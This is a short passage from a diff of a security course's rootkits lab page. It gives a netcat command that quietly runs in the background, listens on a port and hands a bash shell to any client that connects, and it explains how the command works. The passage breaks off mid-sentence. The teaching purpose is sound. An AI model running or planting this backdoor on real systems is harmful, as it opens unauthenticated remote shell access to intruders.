khale/iit-csp544-s22-site/labs/sys-sec/rootkits.md

 ```bash
 nohup nc -nvlp 9474 -e /bin/bash >/dev/null 2>&1 &
 ```
+(note, you may have to install `netcat-traditional` for this to work).

 This listens on port 9474, and when a client connects it will spawn a shell and send output back out over the network socket.
 The `nohup` command prevents the